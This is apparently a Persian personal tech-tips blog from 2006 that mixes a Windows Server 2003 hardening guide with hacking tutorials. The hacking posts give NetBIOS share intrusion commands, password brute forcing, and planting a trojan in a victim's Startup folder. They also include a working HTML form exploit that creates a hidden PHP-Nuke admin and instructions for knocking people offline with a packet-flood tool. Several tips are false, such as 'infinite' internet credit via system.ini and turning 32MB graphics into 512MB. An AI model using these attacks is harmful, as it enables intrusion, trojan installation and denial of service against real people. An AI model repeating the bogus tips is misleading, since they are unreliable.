مشكل اينجاست كه سرئر در هر كدام از اين نقش ها ، نيازهاي امنيتي خاص خودش رادارد . براي مثال ، اگر قرار است كه سرور شما در نقش يك سرو ر IISكار كند ، شما بايد سرويس ها ي IISرا فعال كنيد، در حالي كه اگر سرور قرار است فقط به عنوان يك سرور فايل و پرينت كار كند، فعال كردن IISريسك امنيتي بزرگي خواهد بود. اين موضوع رابد ين د ليل مطرح كرد م كه بدانيد روش خاصي وجود ندارد كه بتوانيد در هر شرايطي آن را دنبال كرده و انتظار نتيجه از آن داشته باشيد . نيازهاي امنيتي يك سرور با توجه به نقش سرور و محيط سرور ( server`s environment ) تفاوت هاي بسياري دارند . از آنجا كه روشهاي متعددي براي ايمن سازي يك سرور وجود دارد ، من فقط موارد ضروري و اساسي را براي فعال كردن يك سرور فايل ساده و در عين حال ايمن ، شرح خواهم داد . سعي خواهم كرد مواردي را مشخص كنم كه وقتي سرور در نقش هاي مختلف كار ، شما بايد به طور متفاوت انجام دهيد اما حتما به اين نكته توجه داشته باشيد كه ااين اعامال در حكم يك راهنماي عمومي براي ايمن سازي همه انواع سرور نيست.

امنيت فيزيكي
براي رسيدن به امنيت واقعي سرور شما بايد در مكان امني قرار گيرد معمولا" اين به معني قرار دادن سرور پشت درهاي بسته است امنيت فيزيكي بسيار همه ماست زيرا بسياري از بازارهاي مديريتي مي‌تواند به عنوان ابزار هك كننده به كارگرفته شود هر شخصي با حداقل مهارت و با استفاده از چنين ابزارهايي در صورت يكه دسترسي فيزيكي به ماشين داشته باشد مي‌تواند يك سرور را در عرض چند دقيقه هك كند تنها راه گلوگيري از چنين حمله‌هايي قراردادن سرور در يك محجيط امن است. اين در مورد هر سرور ويندوز 2003 صرف نظر از نقش ان، صادق است.


ايجاد يك ليست پايه (baseline)
در كنار امنيت فيزيكيك خوب، توصيه مهم بعدي من اين است كه قبل ز استفاده از يك سرور ويندوز 2003 نيازهاي امنيتي خود را مشخص كنيد و به محض به كارگرفتن سرور مومارد مربوطه در خصوص امنيت و سياست هاي مبتني ب ر آنها را نيرز فعال كنيد.
بهترين روش در اين زمينه ايجاد يك ليست پايه امنيتي است اين ليست شامل مدارك و تنظيمات مورد قبول امنيتي است در اكثر شرايط تنظيمايت ليست پايه شما بر اساس نقش سرور كاملا" فرق خواهد داشت.
بنابر اين بهترين كار، ايجاد تعدادي ليست‌هاي پايه متفاوت است كه بتوانيد آنها را براي انواع مختلف سرور به كابر ببريد. براي مثال، ممكن است شما يك يست پايه براي سرورهاي فايل، يك ليست پايه براي كنترل كننده‌هاي دامنه و ليست ديگري براي سرورهاي IIS داشته باشيد.

ويندوز2003 از ابزاري برخوردار است كه محدوده امنيتي و ابزار تحليل ( And Analysis Tool Security Configuration ) ناميده مي شود . اين ابزار به شما اجازه مي دهد كه خط مشي امنيتي جاري سرور را با خط مشي امنيتي ليست پايه كه درون يك فايل الگو قرار دارد ، مقايسه كنيد . شما مي توانيد اين فايل هاي الگو را خودتان ايجاد كنيد يا اينكه از يكي از انواع آماده آنها استفاده كنيد . الگو هاي امنيتي يك رشته متن براساس فايل هاي INF هستيد كه در فولدرSECU %SYSTEMROOT% RITY TEMPLATES ذخيره شده اند . ساده ترين روش برا آزمايش و تغيير الگو هاي شخصي ، از طريق كنسول مديريت مايكر سافت ( Console MMC Microsoft Management ) است . براي باز كردن كنسول ، دستور MMCرا در خط دستور Run وارد كنيد . وقتي كه كنسول خالي بالا مي آيد ، دستور Add Remove Snap-in را نمايش دهد . كليد Add را كليد كنيد ،‌ ليستي از تمام كنسول هاي Snap-in موجود را خواهيد ديد . الگو هاي امنيتي Snap-in را از ليست انتخاب كنيد و سپس كليد هاي Add ، Close و OKرا كليد كنيد.

زماني كه الگو هاي امنيتي Snap-in بالا آمد ، مي توانيد هر كدام از الگو ها را مشخص كنيد . به هنگام مرور درخت كنسول ، خواهيد ديد كه هر الگويي از خط مشي گروه خود تقليد مي كند و نام هر الگو ، اهداف آن الگو را منعكس مي كند . براي مثال ، HISECDC، يك الگو با امنيت بالا براي كنترل كننده هاي دامنه ( security domain Controller high) است اگر قصد ايمن سازي يك سرور فايل را داريد ، من استفاده از الگو ي SECUREWS را به شما توصي همي كنم . با دقت در نوع تنظيمات اين الگو شايد متو جه شويد كه اين الگو با وجود ايمن تر كردن سرور نسبت به قبل ، ممكن است جوابگوي نياز هاي شما نبا شد . تنظيمات امنيتي خاص ممكن است بيش از حد سخگيرا نه يا اغماضگرا نه با شد . من تو صيه مي كنم كه يا با تغييرات جزيي در نوع تنظيمات مو جود ، آنها را با نيازهايتان متناسب كنيد و يا خط مشي هاي جديدي ايجاد كنيد . شما مي توانيد به آساني با كليك راست روي فولد ر C: WINDOWS Security Template، داخل كنسول و انتخاب دستور Template New شده و از منوي ايجاد شده يك الگو ( template) جديد ايجاد كنيد .
وقتي شما يك الگو يامنيتي را مطابق با نياز خود ايجاد كرديد ، به گزينه Add Remove در صفحه Snap-in properties ، يك S nap-in به نام Security Configuration And Analysis را اضافه كنيد . زماني كه Snap-in بالا مي آ يد ، روي Security Configuration كليك راست كنيد وسپس دستور Open Database را از منو انتخاب كنيد . Open را كليد كنيد ، آ نگاه ديتابيس لازم ، با نامي كه شما برايش در نظر گرفته بو ديد ، ايجاد مي شود.

سپس ، روي Security Configuration And Analysis كليد راست كنيد و دستور Template Import را از منوي ميانبر انتخاب كنيد. آنگاه ليستي از كليه الگوهاي موجود را خواهيد ديد . الگويي كه تنظيمات امنيتي شما را در بر مي گيرد ،‌انتخاب كنيد و سپس Open را كليد كنيد . پس از آنكه الگوي شما وارد شد ، دوباره روي Security Configuration And Analysis كليك راست كرده ودستور Analyze Computer Now را از منوي ميانبر انتخاب كنيد . ويندوز مكاني براي نوشتن گزارش خطا ( error log )در اختيار شما قرار مي دهد . مسير فايل را وارد كرده و OK را كليك مي كنيم . در اين مرحله ،‌ويندوز تنظيمات امنيتي موجود در سرور شما را با فايل الگو مقايسه مي كند . شما مي توانيد نتايج اين مقايسه را با مرور در كنسول Security Configuration And Analysis مشاهده كنيد . تنظيمات خط مشي هر گروهي ، هم تنظيمات جاري و هم تنظيمات الگو زا نمايش مي دهد . وقتي كه به اين ليست دست پيدا كنيد، يعني ان كه زمان اجراي خط مشي امنيتي مبتني بر الگو فرا رسيده است . به همين منظور ، براي آخرين بار روي Security Configure And Analysis كليك راست كنيد و دستور Configure Computer Now را از منوي ميانبر انتخاب كنيد . آنگاه اين ابزار خط مشي امنيتي كامپيوتر شما را براي هماهنگ شدن با خط مشي الگو تغيير مي دهد . خط مشي هاي گروهي از يك خصلت موروثي بر خوردارند.
يك خط مشي گروهي ممكن است در سطح كامپيوتر محلي ، سايت ، دامنه يا در سطح OU به كار رود . وقتي كه شما يك سرويس امنيتي مبتني بر الگو را نصب مي كنيد ، در حقيقت در اين سطوح كاربردي تغيير ايجاد مي كنيد . ساير خط مشي هاي گروهي نيز به طور مستقيم تحت تاثير قرار نمي گيرند ، گر چه خط مشي هاي نهايي ممكن است باعث تغييري در تنظيمات نوعي خط مشي شود كه از سطوح بالاتر به به ارث برده شده .

تغيير دادن اعتبارهاي داخلي
سالها مايكرو سافت به شما توصيه كرده است كه نام كاربر مدير ا( Administrator account ) را تغيير دهيد و قابليت ايجاد كاربر ميهمان ( Quest account ) را غير فعال كنيد تا به وضعيت امنيتي خوبي دست يابيد. در ويندوز سرور 2003، به صورت پيش فرض ، قابليت ايجاد كاربر مهمان غير فعال شده است ، اما وظيفه تغيير نام مدير سيستم همچنان بر عهده شما است . اين تغيير نام ، ايده خوبي است زيرا هكر ها و مهاجمان معمولي سعي مي كنند تا به ( Administrator account ) آسيب بر سانند . تعداد زيادي از ابزارهاي هك وجود دارد كه نام اصلي Administrator account را از طريق امتحان S I D پيدا مي كنيد ،‌متاسفانه ، شما نمي توانيد اين account را تغيير دهيد و به همين دليل راهي براي جلوگيري از دستيابي چنين ابزارهايي به نام اصلي Administrator account و تغيير توضيحات اين account را به همه توصيه مي كنم و براي اين كار دو دليل دارم .
اول اينكه ; بسياري ار هكرهاي تازه كار يا غير حرفه اي ممكن است از وجود چنين ابزارهايي اطلاع نداشته باشند و دوم آنكه ،‌تغيير نام Administrator account به يك نام خاص ،‌امكان رديابي و كنترل حملات روي اين account را براي شما فراهم مي كند .
نكته ديگر مربوط به سرورهاي عضو است. سرورهاي عضو هر كدامAdministrator account داخلي خاص خود را دارند كه كاملا با Administrator account دامنه فرق دارد . شما مي توانيد سيستمي ايجاد كنيد كه سرور عضو براي خود از يك نام Administrator account و كلمه عبور جداگانه استفاده كنند . هدف اين است كه اگر افرادي نام Administrator account و كلمه عبور يك سرور عضو را پيدا كردند ،‌ نتوانند از طريق اين اطلا عات بقيه سرور ها را هك كنند. البته ؛ اگر شما وضعيت امنيتي فيزيكي خوبي د ر محل داشته با شيد ،‌طبيعي است از آنجا كه كسي نمي تواند به هيچ سروري دسترسي پيدا كند ،‌نخواهد توانست account محلي آن را هم پيدا كند.

+ نوشته شده در  دوشنبه بیست و سوم مرداد 1385ساعت 11:32  توسط Reza  | 

افزايش سرعت اينترنت(افزايش پهناي باند)در ويندوز XP

در ويندوزXP به صورت پيش فرض نمي توان بيش از حداکثر از 20 درصد از پهناي باند اتصال به اينترنت استفاده کرد.اما براي اين که بتوانيد از 100 در صد پهناي باند استفاده کنيد مراحل زير را انجام دهيد:
-در RUN عبارت gpedit.msc را تايپ کنيد و OK را کليک کنيد.
-منتظر بمانيد تا پنجره Policy Group اجرا شود.بعد از باز شدن پنجره مربوطه مسير زير را پيدا کنيد:
Computer Configuration>Administrative Templates>Network>Qos Packet Scheduler
-اينک گزينه Qos Packet Scheduler را انتخاب کنيد.همچنين به گزينه هايي که در سمت راست صفحه Group Policy ظاهر مي شوند توجه کنيد.سپس گزينهLimit resolvable bandwidth را انتخاب کنيد و با کليک راست بر روي آن گزينه Properties را انتخاب کنيد.
-بعد از اينکه پنجره width properties Limit band باز شد در برگه Setting گزينه Enabled را فعال کنيد و با انتخاب اين گزينه مقدار پيش فرض يعني 20 درصد به نمايش در خواهد آمد.
-حال به جاي عدد 20 مقدار صفر را تايپ کنيد و گزينه OK را کليک کنيد.
-اينک کامپيوتر را restart کنيد تا تغييرات اعمال شود.

+ نوشته شده در  پنجشنبه بیست و چهارم فروردین 1385ساعت 16:56  توسط Reza  | 

چگونه می توان ادامه یک سی دی در صورت داشتن فضای آزاد رایت کرد؟

براي اين که بتوانيد پس از رايت کردن يک سي دي و در صورت وجود فضاي خالي دوباره هم روي همان سي دي رايت کنيد مي بايست هنگام رايت کردن يکdata CD در پنجره اي که مرحله قبل از رايت باز مي شود به قسمت burn رفته و علامت کنار Finalize CD(no father writing possible) را اگر علامت داشت برداريد و به اصطلاح آن را غير فعال نماييد تا بدينوسيله سي دي پس از پايان مرحله رايت به اصطلاح بسته نشود و اين امکان وجود داشته باشد تا بعدها نيز بتوانيد در صورت نياز بر روي فضاي باقيمانده خالي آن اطلاعات را رايت کنيد.
+ نوشته شده در  پنجشنبه بیست و چهارم فروردین 1385ساعت 16:49  توسط Reza  | 

اي پي

این یه برنامه برای جستوجو بین ای پی ها٬ یافتن نام هاست و سرعت پینگ کردن و ...حجم کم و سرعت بالا از ویژگی های این نرم افزار میباشد.

  

 ۱۰۸ کیلوبایت


 Download


 Download

+ نوشته شده در  پنجشنبه بیست و چهارم فروردین 1385ساعت 16:42  توسط Reza  | 

برنامه ای برای ارسال پسورد اینترنت و اکانت اینترنت به زبان فارسی

برنامه ای برای ارسال پسورد اینترنت و اکانت اینترنت به زبان فارسی

 
 
اسم این برنامه Behzad_ps+++7 که توجه داشته باشید تو این برنامه پسورد و

 سایر چیزا برای شما میل میشه و به صورت Bulk برای شما ارسال میشه.

 
از اینجــــــــــــــــــا دانلود کنید

+ نوشته شده در  سه شنبه پانزدهم فروردین 1385ساعت 19:40  توسط Reza  | 

آموزش هک سايت

سلام دوستان
اميدوارم از اين آموزش سو استفاده نكنيد
خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و... حالا در این درس به آموزش چندین روش برای آموزش هک متداول ترین فروم که PHP-Nuke است بپردازیم.
اول باید خصوصیات سایت را بررسی کنید و اولین خوصوصیات ضروری پی اچ پی نوک بودن آن هست! به روش های مختلف هک کردنه یوزر ادمین یا ساختن ادمین مخفی را یاد بگیرید.
در هر سایت نوک یک فروم قرار دارد و همینوطور که میدانید در فروم یک یا چند نفر به cp (مخفف کنترل پانل) دسترسی دارند. شاید از همین فکر چیزی فهمیده باشید. پس در هر تالار چندین کاربر (user) وجود دارد (بستگی به کیفیت تالار دارد) و مدیر هم در بین این کاربران هست و نا کاربری او فاحش هست و می توانید آن را به راحتی ببینید.با این توضیح شما دو روش را برای هم حدس زدید. درسته ! می گن هک سایت سخته ولی اونقدرا هم سخت نیست حتی با ماجیک هم میشه سایت هک کرد! پس فعلا با ماجیک هک می کنیم تا برسیم به جاهای پیشرفته! حالا بايد به سيستم طرف براي نصب تروجان نفوذ كنيد و نت بايوس بهترين راه هست!
نفوذ به سيستم از طريق NetBios

با یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... ) البته من این مقاله رو به صورت تصویری هم تو سایت گذاشتم ، می تونید دانلود کنید.
خب بریم سره موضوع اصلی:
اول باید IP سیستم مورد نظر رو پیدا کنید ( تو سایت قبلا اموزش دادم ) ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:
Net use x: \\IP\DriveName$
به جای X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید:
Net use x: \\80.191.191.39\c$
اگه کمی شانس داشته باشید بدون در خواست User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.
اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید ) (نويسنده : فرشاد عزيز)
حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....
هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin ) یاد بگیریم! اول باید بفهمیم که نوک چیست؟
پی اچ پی نوک انواع مختلفی دارد که از سال ۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke
این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک ۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد هک می کند.

<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form>


خوب در قسمتی از کد نوشته شده:
http://www.sitename.com/admin.php
به جای sitename نام سایت را بنویسید و آن را با پسوند html ذخیره سازید.
به این صورت : exploit.html
حالا روی آن کلیک کنید و صفحه ای همانند صفحه ی عضویت در آن تالار باز می شود! (حالا بستگی دارد که چه چیز هایی از شما درخواست کند) حالا آن را که پر کردید در زیر آن Create Admin را کلیک کنید و مستقیما به
http://www.sitename.com/admin.php میرید و اونجا با یوزری (شناسه ایی) که ساختید وارد شوید! حالا شما هم سایت پی اچ پی نوک هک کردید!

موفق باشید
+ نوشته شده در  سه شنبه پانزدهم فروردین 1385ساعت 14:10  توسط Reza  | 

ديسكانکت كردن يك شخص

ديسكانکت كردن يك شخص روشهاي مختلف و متداولي براي اينكه

شخصي كه در اينترنت در حال كار كردن هست ، ارتباط كاربر را از اينترنت از

 راه دور قطع كنيد يا اصطلاحا كاربر را disconnect نماييد.

يكي از اين روش ها ارسال پكيج (بسته ) هاي بسيار زياد (روش Nuke ) در

يك زمان به سمت كامپيوتر شخص كه در اين روش مودم دستگاه درحال

پردازش اولين بسته است كه دومين بسته مي رسيد و همين طوري تا

اينكه Modem يا سيستم قفل مي كند ( hang ) .

يكي از برنامه هايي كه اين كار را براي شما انجام ميدهد Rocket

مي باشد.

قبل از اجراي برنامه بايد تنظيمات زير را در سيستم خود انجام دهيد :

به منوي Start رفته و گزينه Settings سپس به Control Panel برويد.

1- در داخل پانل كنترل به دنبال Modems بگرديد و آن را اجرا كنيد .

2- حال مودم خود را انتخاب نماييد

3- گزينه Properties را انتخاب كنيد.

4- در پنجره به تب Connection رفته

5- دكمه Advanced را فشار دهيد.

6- در كادر ظاهر شده در قسمت Extra Settings اين را تايپ كنيد : S2=255

7- دكمه Ok را بزنيد و خب حالا ميتوانيد با برنامه كار كنيد!

شما بايد برنامه ي راكت "ROCKET" رو بگيريد كه زيااد هست حالا راكت نه

1 چيزه ديگه.. همه 1 نوع گزينه دارند...:

بعد از اجراي برنامه شما گزينه هاى زير را مشاهده خواهيد كرد:

Target IP : در اين قسمت شماره IP فردي را كه به اينترنت وصل مي

باشد را يادداشت مي كنيم به طور مثال 213.155.14.28

Data : اين جا فرماني است كه به سوي سيستم فرد قرباني ارسال ميشود

 (( توجه اين جا رو دست نزنيد!!‌))

Times و time Out هم زمان و تاخير بين فرستادن هر بسته را نشان ميدهد

 كه ميتوانيد دست نزنيد!‌

خب كار تموم شد فقط كافي است Targer IP را وارد كنيد و دكمه Send

Packet را فشار دهيد! به همين راحتي

***

نكته : اگر ميبينيد كه بعد از نوشتن IP فرد قرباني خود شما از اينترنت قطع

ميشويد!! خب معلوم است كه مراحل اول را درست انجام نداده ايد پس

دوباره مودم خود را تنظيم كنيد!

فرمان S2=255 به مودم شما ميگويد كه واكنشي در مقابل فرمان ath0++

نشان ندهد.         نظر یادتون نره

+ نوشته شده در  سه شنبه پانزدهم فروردین 1385ساعت 14:0  توسط Reza  | 

به درخواست اقا توحید

+ نوشته شده در  سه شنبه پانزدهم فروردین 1385ساعت 13:52  توسط Reza  | 

جواب انجلاس

1.Control Panel/XXXXX/alternates/edit/

پست الکترونيک خودت رو بنویس

+ نوشته شده در  سه شنبه پانزدهم فروردین 1385ساعت 13:48  توسط Reza  | 

گروه هک تشکیل می دیم کی عضو می شه نظر بده

+ نوشته شده در  دوشنبه چهاردهم فروردین 1385ساعت 23:10  توسط Reza  | 

با ۳ دقيقه مکالمه رايگان با موبايل چطوريد؟+picture message

براي گوشي هاي نوکيا بريد به اين آدرس
menu---> setting--->security--->closed user---> groupe ---> activate
حالا بعد از اين که اکتيو کرديد از شما يه شماره خواسته ميشه شما 4رقم آخر شماره موبايل خودتون رو وارد کنيد ! 0912 که هيچي !! 3 رقم بعدش هم هيچي !! اون 4تايي که اخر ميمونه رو وارد کنيد بعدشم اوکي کنيد و ديگه کار تمومه     
براي گوشي سامسونگ يه اين آدرس بريد
Menu--->network setting--->closed user groupe---> activate
بعد از اين که اکتيو کرديد وارد منوي زير ميشيد
Menu--->network setting-->closed user groupe---> cug text
و در اينجا هم مثل بالا 4 رقم اخر شماره خودتون رو بديد و ديگه تموم بعدشم منتظر قبض بشينيد تا بياد دم خونه
+ نوشته شده در  پنجشنبه دهم فروردین 1385ساعت 13:42  توسط Reza  | 

سرعت دانلودت 50 برابر کن

روی دسکتاپ رایت کلیک کن.و پروپرتیز رو انتخاب کن.بعد به پوشه دسکتاپ برو

را انتخاب کنcousitimens desktopو

بعد در پوشه وب به پروپر تیز برو.بعد در پوشه دانلود

limit hard diskusges for tjis page to

رو فعال کن و عدد ۵۰۰ را به ۱۰۰۰ تبدیل کن

تموم شد حال سرعت دانلودت 50 برابر شد

+ نوشته شده در  پنجشنبه دهم فروردین 1385ساعت 13:41  توسط Reza  | 

sms in yahoo mesenger

دوستان توجه داشته باشند که برای SMS در Yahoo! Messenger  باید  ID:   lge_iran را Add کنید.سپس شماره موبال را  که می خواهید به آن SMS بفرستید را نوشته واین علامت , را جلوی شماره گذشته و پیغام خود را گذشته و  send را می زنید . دوستان به این نکته توجه داشته باشند با یک ID فقط می توان دو SMS در روز فرستاد.
+ نوشته شده در  پنجشنبه دهم فروردین 1385ساعت 13:41  توسط Reza  | 

چگونه کارت اینترنت خود را بی نهایت کنیم؟

در باره این موضوع خيلي ها تو وبلاگهاشون گذاشتن ولي اخه يكي نيست بهشون بگه اخه وقتي بلد نيستين واسه چي چرت و پرت به مردم ياد ميدين ولي من اينجا درستش رو براتون گذاشتم اميدوارم يعني مطمئنم به كارتون مياد

از منوی استارت دنبال ران بگرد و در ران تایپ کن:

system.ini

یک نوتپد وا میشه دنبال عبارت زیر بگرد

[386enh]

و زیرش این نوشته ها رو کپی کن

Com0@00 Irq0000@0 Buffer=1024
@ number = ( 3,1,4,1,5,9)
@ letters = ( " this", " is ", "a" , "test" )
$word , $ anther - word - ) = ( " one " , "two" )
woafont=dosapp.FON
اطمینان دارم دیگه اکانت تموم نمیشه.و روش کارشم اینه که تایمر آی اس پی رو قفل میکنه

+ نوشته شده در  پنجشنبه دهم فروردین 1385ساعت 13:40  توسط Reza  | 

چگونه وقتی به اینتر نت وصل هستیم تلفنمان اشغال نشود؟

از استارت وارد کنترلپنل شوید.بعد به نتورک کانک شن مراجعه کن و روی کارت مورد نظر رایت کلیک کن و بعد پروپرتیز رو بزن.حالا به پوشه ادونسد برو و روی ادیت کلیک کن و در کادر خالی عبارت زیر را بزنید

call waiting

تمام است حالا اگر شما در اینتر نت باشید کسی زنگ بزند در گوشه صفحه هشدار زیر می آید:

call wating now active

+ نوشته شده در  پنجشنبه دهم فروردین 1385ساعت 13:38  توسط Reza  | 

گرافیک 32=گرافیک 512 چه جوری؟

اگه دستگات گرافیکش پایینه گرافیک ۳۲ رو به ۵۱۲ تبدیل کن.با این ترفندی که من میگم!!!!!! رو دسکتاپ راست کلیک کن و بعد در پوشه ستینگ روی ادونسد کلیک کن و بعدپوشه آدپتر روی پوشه ریسکریسور کلیک کن وirq را انتخاب کن وبعد او کی کن تموم شد حالا کارت گرافیکت شد 512

+ نوشته شده در  پنجشنبه دهم فروردین 1385ساعت 13:38  توسط Reza  |